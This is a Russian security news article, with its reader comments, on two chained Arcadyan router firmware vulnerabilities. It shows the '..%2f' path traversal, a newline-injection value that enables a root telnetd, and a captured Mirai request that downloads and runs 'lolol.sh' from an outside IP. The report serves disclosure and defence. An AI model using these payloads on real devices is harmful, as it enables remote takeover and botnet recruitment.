The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Уязвимость в домашних маршрутизаторах, охватывающая 17 производителей

09.08.2021 11:04

В сети зафиксирована массовая атака на домашние маршрутизаторы, в прошивках которых используется реализация http-сервера от компании Arcadyan. Для получения управления над устройствами применяется сочетание двух уязвимостей, позволяющих удалённо выполнить произвольный код с правами root. Проблема затрагивает достаточно большой спектр ADSL-маршрутизаторов от компаний Arcadyan, ASUS и Buffalo, а также устройств, поставляемых под брендами Билайн (проблема подтверждена в Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone и других операторов связи. Отмечается, что проблема присутствует в прошивках Arcadyan уже более 10 лет и за это время успела перекочевать как минимум в 20 моделей устройств от 17 различных производителей.

Первая уязвимость CVE-2021-20090 даёт возможность обратиться к любому скрипту web-интерфейса без прохождения аутентификации. Суть уязвимости в том, что в web-интерфейсе некоторые каталоги, через которые отдаются картинки, CSS-файлы и сценарии JavaScript, доступны без аутентификации. При этом проверка каталогов, для которых разрешён доступ без аутентификации выполняется по начальной маске. Указание в путях символов "../" для перехода в родительский каталог блокируется прошивкой, но использование комбинации "..%2f" пропускается. Таким образом, имеется возможность открытия защищённых страниц при отправке запросов, подобных "http://192.168.1.1/images/..%2findex.htm".

Вторая уязвимость CVE-2021-20091 позволяет аутентифицированному пользователю внести изменения в системные настройки устройства через отправку специально оформленных параметров скрипту apply_abstract.cgi, который не осуществляет проверку наличия символа перевода строки в параметрах. Например, атакующий может при выполнении операции ping указать в поле с проверяемым IP-адресом значение "192.168.1.2%0AARC_SYS_TelnetdEnable=1" и скрипт при создании файла с настройками /tmp/etc/config/.glbcfg запишет в него строку "ARC_SYS_TelnetdEnable=1", которая активирует сервер telnetd, предоставляющий неограниченный доступ в командную оболочку с правами root. Аналогично при помощи установки параметра ARC_SYS можно выполнить любой код в системе. Первая уязвимость даёт возможность запустить проблемный скрипт без аутентификации, обратившись к нему как "/images/..%2fapply_abstract.cgi".

Для эксплуатации уязвимостей у атакующего должна быть возможность отправки запроса на сетевой порт, на которым выполняется web-интерфейс. Судя по динамике распространения атаки многие операторы оставляют на своих устройствах доступ из внешней сети для упрощения диагностики проблем службой поддержки. При ограничении доступа к интерфейсу только для внутренней сети атака может быть совершена из внешней сети при помощи техники "DNS rebinding". Уязвимости уже активно используются для подключения маршрутизаторов к ботнету Mirai:


   POST /images/..%2fapply_abstract.cgi HTTP/1.1  
   Connection: close  
   User-Agent: Dark  

   action=start_ping&submit_button=ping.html&
   action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A
ARC_SYS_TelnetdEnable=1&
   %0AARC_SYS_=cd+/tmp;
   wget+http://212.192.241.72/lolol.sh;
   curl+-O+http://212.192.241.72/lolol.sh;
   chmod+777+lolol.sh;
   sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4 


  1. Главная ссылка к новости (https://blogs.juniper.net/en-u...)
  2. OpenNews: Уязвимости в устройствах NETGEAR, позволяющие получить доступ без аутентификации
  3. OpenNews: Уязвимости в Cisco RV32x были "устранены" через блокировку запросов от утилиты curl
  4. OpenNews: Волна атак на клиентские маршрутизаторы
  5. OpenNews: В DSL-маршрутизаторах Asus, ZTE и Digicom выявлены предопределённые параметры входа
  6. OpenNews: Атака Cable Haunt, позволяющая получить контроль над кабельными модемами
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/55609-router
Ключевые слова: router
Поддержать дальнейшую публикацию новостей на OpenNET.


Обсуждение (316) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 11:14, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +12 +/
    это какой-то дибиликон
     
     
  • 2.4, OnTheEdge (ok), 11:15, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +17 +/
    дЫры в каждый дом!
     
  • 2.88, Брат Анон (ok), 14:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Они говорили теперь подключение в публичных местах только по паспорту.
     
     
  • 3.258, Аноним (-), 14:32, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Они говорили теперь подключение в публичных местах только по паспорту.

    Пришлите на mirai пуллреквест, чтобы паспорт у юзера спрашивал?

     
  • 2.136, Аноним (-), 17:27, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    На 20-й год Зоркий Глаз все же нашел старые грабли и наступил на них второй раз.
     
     
  • 3.291, Аноним (291), 10:30, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Важно уточнение: грабли были детские.
    Поэтому было важно наступить именно два раза.
     
  • 2.221, Хакер (?), 00:47, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    У меня всеравно только порнуха на компе!
     
     
  • 3.232, Аноинм (?), 10:40, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    > У меня всеравно только порнуха на компе!

    Ну тогда и ник смени. Например на др@чер. Честнее будет :)

     
  • 3.317, vitektm (?), 17:42, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Не удивлюсь если даже дистриб winrar 2.8 и winamp :)
     

  • 1.3, Аноним (3), 11:14, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Потому что не надо пихать коричневую поделку одного вендора везде. Решил не проявлять оригинальность и сделать как у конкурента - ошибку перетянул себе.
     
     
  • 2.6, Ruslan (??), 11:19, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +19 +/
    А надо было каждый раз с нуля веб-сервер писать для каждой модели роутера?)
     
     
  • 3.8, OnTheEdge (ok), 11:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    надо было просто поставить nginx

    upd: сарказм!

     
     
  • 4.10, piconim (?), 11:28, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +10 +/
    который весит столько же, сколько остальная операционка в этих роутерах
     
     
  • 5.137, Аноним (-), 17:30, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну не столько. И можно собрать в минимальном варианте. Я так делал, на топоавом мипсе очень даже почтенно файло с харда грузит. Но там флеша, правда, 16 мегз, можно попижонствовать.
     
  • 4.14, ryoken (ok), 11:50, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вот на роутере этого мамонта только не хватает.
     
  • 4.57, anonymous (??), 13:21, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Почему сарказм? ЕМНИП, в кинетиках nginx, и ничего, все довольны. Из таких нетиповых решений, как в новости, у них SMB-сервер, пришедший на смену заброшенной Samba 3.x, но они это и не скрывают.
     
     
  • 5.73, Аноним (291), 14:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Компания Zyxel вообще очень серьезно относится к безопасности, судя по дефолтным паролям на админа 1234 (через несколько лет все-таки поменяли на cloud1234).
     
     
  • 6.86, YetAnotherOnanym (ok), 14:49, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с формой для смены пароля. Да, там есть кнопка "Игнорировать", но это уже решение владельца. Так что к инженерам зухела по этому вопросу претензий быть не должно. Они предупредили и дали возможность принять меры.
     
     
  • 7.133, Аноним (291), 17:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > Вообще-то, у зухела сразу после входа по дефолтному паролю выдаётся страница с формой для смены пароля. Да, там есть кнопка "Игнорировать", но это уже решение владельца.

    Неловко получается, если зашел не владелец.

     
     
  • 8.140, Аноним (-), 17:51, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну так зашедший и сменит пароль ... текст свёрнут, показать
     
  • 8.272, Michael Shigorin (ok), 21:48, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    В смысле Теперь он владелец ... текст свёрнут, показать
     
  • 7.211, Аноним (211), 22:45, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Да, у них просто поддержка устройств заканчивается, и даже прошивок, их же, не з... большой текст свёрнут, показать
     
  • 4.72, Аноним (291), 14:06, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    >  надо было просто поставить nginx

    В задачу веб-сервера не входит нормализация REQUEST_URI.

     
  • 3.27, Урри (ok), 12:13, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Причем со своими, уникальными ошибками.
     
     
  • 4.74, Аноним (-), 14:12, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Которых никто не знает, в отличии от массовых.
     
     
  • 5.81, Аноним (291), 14:25, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    "Не пугайте страусов, пол бетонный"

    Security by obscurity ("прячем голову в песок и делаем вид, что мы в ебзопасности") работает только для неуловимых Джо.
    Если роутер продукт занимает хоть сколько-нибудь значительную долю рынка - в эту группу он уже не попадает.

     
     
  • 6.112, ryoken (ok), 16:38, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >> "в ебзопасности"

    Вот хорошее слово, правильно написали :).

     
  • 5.95, Аноним (-), 15:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Которых никто не знает, в отличие от массовых.

    Надо будет злоумышленникам - узнают и применят. Это как распространять закрытый шифр или программу с закрытым исходным кодом и вместе с тем надеяться, что никто никогда не найдёт там ошибок, ведь "их никто не узнает"

     
  • 3.85, Аноним (85), 14:43, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво, но если надо готовое с функционалом побогаче - их навалом в опенсорсе, зачем какое-то мутное проприетарное говно тянуть? Иначе как садомазохизмом и тупостью такое не объяснить.
     
     
  • 4.107, пох. (?), 15:51, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –4 +/
    > Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво

    и отдает твой ../../../../..////etc/shadow за время меньшее, чем откупорить новое пиво. Кстати, подскажи, зачем роутеру - "минимальный" и какой, кстати, ему на самом деле нужен и что должен уметь.

    Почему вместо этого г-на не был взят банальный апач (против nginx в эмбедовке сейчас больше чем "за") - спросите девляпса которого наняли вместо архитектора.

    Ну а вы чего ждали - за эти деньги, хорошо если он был студентом первого курса, а не отчисленным сразу же с первого.

     
     
  • 5.138, Аноним (85), 17:34, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    У меня uttpd в роуторе - чуть более, чем самый минимальный, но всё равно в 1 си-портняку влезает. И очевидно что его хватает, так зачем же тащить что-то более жирное? Чем жирнее сырцы, тем выше вероятность ошибки.
     
     
  • 6.143, пох. (?), 17:56, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    прости, а зачем у тебя в роутере бесполезное ненужно?
    Очевидно что его "хватает" для абсолютно ничего, поскольку он ничегошеньки и не умеет.

    Я могу понять его на "дрисктопе", когда нужно срочно выложить брату-васяну файлик а более разумный способ в голову не пришел (или никого там не застал) а на роутере обычно веб-сервер совсем-совсем для другого.

     
     
  • 7.155, Аноним (85), 18:41, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    О, да у нас тут иксперд в треде! uttpd кроме статики умеет Lua скрипты выполнять, а больше действительно ничего на роуторе не нужно от сервера.
     
  • 7.233, Аноним (-), 10:41, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > прости, а зачем у тебя в роутере бесполезное ненужно?

    Вебморду рисовать, вероятно. Для минимальной морды его хватит, не? Или тебе там надо апача-на-рельсах? :)

     
     
  • 8.239, пох. (?), 11:44, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    в стиле цельнозолотых часов и телефона Хоттабыча, которые очень впечатляли, толь... текст свёрнут, показать
     
     
  • 9.251, Аноним (-), 13:45, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну я uhttpd на каком-то модеме видел А, да, модемы нынче так то тоже иной раз п... большой текст свёрнут, показать
     
  • 5.275, Michael Shigorin (ok), 22:00, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Почему вместо этого г-на не был взят банальный апач (против nginx в
    > эмбедовке сейчас больше чем "за")

    Тогда уж boa какой?

     
     
  • 6.276, пох. (?), 22:13, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ну я в сортах не разбираюсь, а этих двух использую много лет - поэтому вполне уверен, что для роутера сойдут.

    (в отличие от недосерверов из 100 строк на си, не умеющих ничего кроме плейнтекст и тот криво)

     
     
  • 7.295, Аноним (-), 11:49, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А на роутере ничего кроме плейнтекста и не надо.

    1. Жать что-то на хилом проце? На жирном локальном линке? Э, ты там точно системщик? Или ты решил HTTP/2 попродвигать? Ну нет, быстрые вебморды так то хорошо, но не ты ли его в соседних коментах крыл? Да и профита на вот именно локальном линке от мультиплексирования будет мизер, там RTT никакой.
    2. Шифровать? На хилом проце? С openssl, который половину флехи занимает? А, да, и на что там сертификат выписывать?

    Так что в принципе - you can get away with it. Однако вулнов у наивного чукотского юноши там будет... хаксор тупо скачает конфигурацию и сможет узнав пароль зайти как белый человек. Или если там хеш, зальет свою конфигурацию, с своим паролем.

     
     
  • 8.297, пох. (?), 12:23, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    эксперт впопеннета во всей красе Ему на протяжении пяти итераций объясняют, что... текст свёрнут, показать
     
     
  • 9.311, Аноним (-), 14:56, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну да, ну да, пох нам ща крашкурс изготовления вебморд дадет Начинайте, Проф... текст свёрнут, показать
     
  • 4.108, Аноним (108), 15:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +6 +/
    Привет, программист компании Arcadyan
     
     
  • 5.145, пох. (?), 18:00, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    > Привет, программист компании Arcadyan

    не, это не программист, это уборщица (по совместительству - девляпс) из той же компании. Она даже не в курсе, зачем тот сервер был нужен, судя по ссылке на феерическое бесполезное ненужно, умеющее исключительно статику без авторизации. Не факт что и без уязвимостей, неуловимый джо никому не нужен копаться в его кишках.

    (если что, djb более приличное написал двадцать лет назад https://cr.yp.to/publicfile.html - но на роутере оно тоже вопиюще неуместно)

     
     
  • 6.156, Аноним (85), 18:42, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Какой ссылке? Ты нaркоман? Я тебе никаких ссылок не давал.
     
     
  • 7.203, Аноним (-), 21:37, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Какой ссылке? Ты нaркоман? Я тебе никаких ссылок не давал.

    Он не наркоман, у него морда от балтики опухла, ничего не подумай.

     
  • 4.141, Аноним (-), 17:55, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    > Минимальный хттп сервер на сишечке в < 100 строк кода пишется под пиво,

    ...и покупается на 9 из 10 таких приколов, ага. Как впрочем и любой сервер на <whatever> писаный под пиво за вечер. Но мы можешь попробовать и запустить потом на этом какой-нибудь сканер безопасности. Потом лог выложи, вместе поблюем на твою предусмотрительность.

    Ты недооцениваешь опасность вывешивания ФС всему миру. А вон там и куда более интересные атаки есть.

    > но если надо готовое с функционалом побогаче - их навалом
    > в опенсорсе, зачем какое-то мутное проприетарное говно тянуть?

    Производители дырлинков так то на маркетинг проприетариев ведутся больше.

     
     
  • 5.146, пох. (?), 18:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > ...и покупается на 9 из 10 таких приколов, ага. Как впрочем и
    > любой сервер на <whatever> писаный под пиво за вечер. Но мы

    Кстати да, даже netch@ со своим smtp на awk с первой попытки слегка лоханулся.

    > можешь попробовать и запустить потом на этом какой-нибудь сканер безопасности. Потом

    не поможет, сканеры не на нейросетях пока еще, они ищут только известные дырки в известных серверах, секьюрить бай обскурить тут вполне сработает.

    > Производители дырлинков так то на маркетинг проприетариев ведутся больше.

    там может и впрямь какие-то удобные для эмбедовки (и прямо противоречащие безопасности) фичи были.
    Типа без конфига, одними ключами управляется, еще какая-нибудь бжня в том духе.

    лучше не знать.

     
     
  • 6.161, Аноним (-), 19:01, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ну дык, символы с специальной трактовкой штука подлючая, а тут прямо в семантике ФС подстава.

    Кто как, а лично я все сетевые сервисы отпиливаю в изолированные неймспейсы, там система лысая получается. Не, даже /etc/shadow не сопрешь, его нет. Оно не сможет это отсервировать даже если б захотело. А ты думал что контейнеры и системд только для хайпа нужны? А вот можно еще хацкерам неудобно делать, чтобы не было как у этого аркадиана :)

     
     
  • 7.163, пох. (?), 19:15, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    ничего что семантика url и отражает семантику fs Ну а что ниасиляторы ниасиляю... большой текст свёрнут, показать
     
     
  • 8.180, Аноним (-), 20:42, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да, но сочетание URL Encoding вот этой фичи делает это чуть менее очевидным дл... большой текст свёрнут, показать
     
     
  • 9.226, пох. (?), 09:00, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    у меня есть хосты работающие по три-четыре года непрерывно и перезагружающиеся ... текст свёрнут, показать
     
     
  • 10.235, Аноним (-), 10:51, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да так то и запасной парашют обычно нафиг не нужен Однако облом случается если ... большой текст свёрнут, показать
     
     
  • 11.277, пох. (?), 22:18, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    и чем бы ему тут помог запасной парашут Вот и тебе не поможет ... текст свёрнут, показать
     
     
  • 12.296, Аноним (-), 11:51, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Да, пох, иногда не поможет даже запасной парашют Но довольно часто - помогает, ... текст свёрнут, показать
     
  • 9.227, пох. (?), 09:08, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    и да, что непонятно в запускать и взаимодействовать Твой наколенный аналог p... большой текст свёрнут, показать
     
     
  • 10.236, Аноним (236), 11:26, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Вообще, я lwan для странных вещей предпочитаю Там автор вроде понимает что дела... большой текст свёрнут, показать
     
     
  • 11.240, пох. (?), 11:47, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    За лёнину невменяемую блоатварь платят не деньгами так своим временем угу - ва... текст свёрнут, показать
     
     
  • 12.253, Аноним (-), 14:01, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    1 Доки на блоатварь таки вполне приличные 2 Кодинг нормальной запускалки с na... большой текст свёрнут, показать
     
     
  • 13.254, пох. (?), 14:07, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    ты таки можешь починить мне неработающую загрузку А, опять это другое потому... текст свёрнут, показать
     
     
  • 14.262, Аноним (-), 18:13, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Unknown И я не горю желанием узнать Я не подбирал конфиг, систему и софт и не ... большой текст свёрнут, показать
     
     
  • 15.271, пох. (?), 21:38, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    разумеется, нет Подобрал на помойке то что получилось кое-как завести готовыми ... большой текст свёрнут, показать
     
     
  • 16.299, Аноним (-), 13:14, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Ты в чем-то прав, если ты имел в виду что я для того чтобы взлететь оперся на пл... большой текст свёрнут, показать
     
     
  • 17.303, пох. (?), 13:43, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    Потому что речь о квалификации Которой у тебя нет, поэтому ты и не в состоянии ... большой текст свёрнут, показать
     
     
  • 18.312, Аноним (-), 15:46, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Все познается в сравнении Как минимум, у меня все грузится, работает, и мне не ... большой текст свёрнут, показать
     
     
  • 19.316, пох. (?), 17:25, 11/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    у тебя только то что на что ты осилил поставить не тобой не только разработанное... большой текст свёрнут, показать
     
  • 16.324, andy (??), 08:29, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это понятно, мало кому понравится Тоже понятно Почему нет Вон, Solaris 11 еще ... текст свёрнут, показать
     
     
  • 17.325, пох. (?), 11:19, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    это уже конвульсии Там всех разработчиков уволили еще три года назад, нет уже п... большой текст свёрнут, показать
     
     
  • 18.327, andy (??), 13:43, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Я тогда не работал с linux ом Я правильно понимаю, что сейчас тебе мешает попра... текст свёрнут, показать
     
     
  • 19.332, пох. (?), 14:49, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    нет, так было всегда Начиная с так и не принятого фикса сброса scsi cache, из-з... большой текст свёрнут, показать
     
     
  • 20.333, andy (??), 16:20, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А они что сделали P S User, ты тут ... текст свёрнут, показать
     
  • 21.334, пох. (?), 16:47, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    ну, нечеловеческим усилием их удалось уговорить на timezone update после уже по... текст свёрнут, показать
     
  • 22.335, andy (??), 17:45, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А почему нельзя было на актуальную ветку перейти ... текст свёрнут, показать
     
  • 23.336, пох. (?), 20:24, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    потому что как обычно, у актуальной много чего поломано, требования к железу выш... текст свёрнут, показать
     
  • 24.337, andy (??), 20:28, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А локальное зеркало с ядра мира с нужными патчами поддерживать накладно было ... текст свёрнут, показать
     
  • 25.338, пох. (?), 21:09, 12/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    нужные патчи еще нужно вовремя заметить и вовремя сбэкпортить А поскольку это в... текст свёрнут, показать
     
  • 6.162, Аноним (-), 19:10, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    ЗЫ по моему проверки на ../../../etc/passwd умели даже штуки типа нмапа. И там штук цать проверок такого плана на всю типовую лажу. КМК, писаный за вечер HTTP хоть там на чем - на половине этого срежется.

    А из главных фич всякой экзотичной проприетари обычно является маркетинговый булшит в уши манагерам и гламурные буклеты. А так некоторые и обычный thttpd юзают. Его вроде даже сам по себе не особо выносят но какие-нибудь гамноскрипты писаные индусами все-равно могут испортить компот.

     
     
  • 7.166, пох. (?), 19:22, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    > ЗЫ по моему проверки на ../../../etc/passwd умели даже штуки типа нмапа. И

    да, но посмотри эту увизгвимость - там гораздо интереснее факапы с подстановкой переменной управляющей индусским скриптом.

    такое вряд ли можно кроме как реверсом угадать.

    > А из главных фич всякой экзотичной проприетари обычно является маркетинговый булшит в
    > уши манагерам и гламурные буклеты. А так некоторые и обычный thttpd

    боюсь там будут проблемы с CORS и прочими модными штуками. Не то чтоб прям опастносте-опастносте, но либо что-то сломаешь, либо наоборот при заходе на порносайт заодно перезагрузится конфигурация роутера.

     
     
  • 8.237, Аноним (-), 11:31, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ну вот это уже видимо кто-то проштудировал начинку этого нечто А что, народа ко... большой текст свёрнут, показать
     

     ....большая нить свёрнута, показать (68)

  • 1.5, Аноним (-), 11:17, 09/08/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • –6 +/
    И никакой Rust бы не помог (у которого нашли точно такую же уязвимость в масках IP-адресов).
     
     
  • 2.9, OnTheEdge (ok), 11:25, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    точно такую же? уверены?
     
     
  • 3.26, Аноним (26), 12:09, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ты еще и в сортах дыр разбираешься?
     
     
  • 4.41, OnTheEdge (ok), 12:54, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    было бы в чём: сишные и несишные
     
  • 3.130, Аноним (130), 17:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Нет, у раста нашли куда хуже. А куда хуже это потому что в самом раст
     
     
  • 4.135, Аноним (291), 17:27, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Есть непроверенная инфа, что на расте можно написать программу, которая удаляет все файлы в системе.

    Если подтвердится - будет пушка.

     
     
  • 5.231, Аноним (231), 10:12, 10/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Язык программирования, с помощью которого невозможно спалить процессор - плохой язык. А уж удалить все файлы в системе - это минимум.
     
  • 5.340, Артур (??), 09:33, 17/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Так это и на Bash'е (а соответственно и на любом другом языке) можно!
    Это вопросы ОСи, а не языков.
     
  • 3.142, Аноним (-), 17:56, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > точно такую же? уверены?

    Да похожего свойства, неаккуратная работа с данными. Так в принципе на любом ЯП лохануться можно. Если вы отгружаете ремоте файлы - вас могут здорово залошить странными именами файлов.

     
  • 2.25, Аноним (26), 12:08, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если верить то и святая вода защитит. А ты еретик, десять плетей тебе.
     
  • 2.32, Аноним (32), 12:33, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +5 +/
    С одной стороны - да, забыть про urlencode можно на любой языке.
    С другой стороны - в расте приветствуется переиспользование кода в виде готовых модулей, типа https://docs.rs/url/, и там такой ошибки нет.
     
     
  • 3.38, Урри (ok), 12:48, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    И сколько будет весить решение на расте? Влезет в прошивку роутера?

    А заодно насколько надежно будет работать на разных платформах, на которых работают роутеры?
    Раст обещает, что ваши arm, mips, ppc и т.д. программы скомпилятся, но не обещает, что запустятся.

    И вообще, получится хотя бы перекомпилировать ваш код через год, когда выйдет 14 новых версий раста, через одну ломающих обратную совместимость?

     
     
  • 4.52, Аноним (52), 13:11, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Щас они притащат библиотеку раста и упихают ее в 4мб флеш памяти вместе с последним ядром. Они же на расте и не такое могут. Сейчас вот прям пойдут и напишут архиватор, который на расте будет быстрее работать, чем Сишные архиваторы, а сжимать будет в 100 раз лучше.
     
     
  • 5.62, Аноним (62), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Это математически невозможно в 100 раз.
     
     
  • 6.70, Аноним (291), 14:03, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Если взять сишный архиватор Бабушкина - то вполне.
     
  • 4.60, Аноним (32), 13:34, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +4 +/
    какой жирный тролль!

    прошивка на расте в IP-камеры - лезет https://habr.com/ru/company/erlyvideo/blog/334912/, значит и в роутер пятилетней давности влезет.

    настолько надёжно, насколько генерит бинарный код LLVM
    и никто вам ничего не "обещает". берёшь, собираешь, запускаешь. работает - в 99.99+% случаев, иначе разбираешься или пишешь на bugs.llvm.org

    получится. раст обеспечивает обратную совместимость кода, а если ломает - то это документируется
    https://doc.rust-lang.org/stable/rust-by-example/compatibility.html

     
     
  • 5.63, Аноним (62), 13:35, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    npm c node.js тоже много чего обещает. Только ничего не работает потом.
     
     
  • 6.67, Аноним (291), 13:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Нода - это как сишечка. Стильно, круто, олдскульно. Никакого смузи.
    Так что не в ту сторону воюете.
     
     
  • 7.105, Аноним (62), 15:39, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Это ж сколько тебе лет что надо это олдскульно 7 лет?
     
  • 7.144, Аноним (-), 17:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Нода - это как сишечка. Стильно, круто, олдскульно. Никакого смузи.

    Нода? Как сишечка? Да ты упрлс.

     
  • 5.80, Урри (ok), 14:23, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –6 +/
    какой глюпый аноним Не прошивка на расте, а аж целый самописный стример, которы... большой текст свёрнут, показать
     
     
  • 6.147, Аноним (-), 18:05, 09/08/2021 Скрыто модератором
  • –1 +/
     
  • 5.92, Аноним (52), 14:58, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Конечно лезет. Заодно LLVM с собой тащит.

    > Страница не найдена
    >Страница устарела, была удалена или не существовала вовсе

     
     
  • 6.99, Аноним (99), 15:16, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Запятую в конце удали.

    А вообще по ссылке к обычной прошивке добавили стример на расте, являющийся, цитирую(!):

    "Целая пачка unsafe кода, автогенеренного из сишного кода SDK с помощью bindgen, подпатченый биндинг к libc (постараемся залить патч в апстрим) и дальше реализация RTSP на tokio."

     
  • 6.113, Аноним (-), 16:45, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
    > Конечно лезет. Заодно LLVM с собой тащит.

    Чего и куда тащит? "Огласите весь список, пжста!"(с)

     
     
  • 7.115, Аноним (52), 16:52, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • –3 +/
    Угадал, это как раз из советского репертуара "..и в землю закопал.". Чего спорить с сумасшедшим коли ссылка нерабочая?
     
     
  • 8.131, Аноним (131), 17:18, 09/08/2021 [^] [^^] [^^^] [ответить]  
  • +/
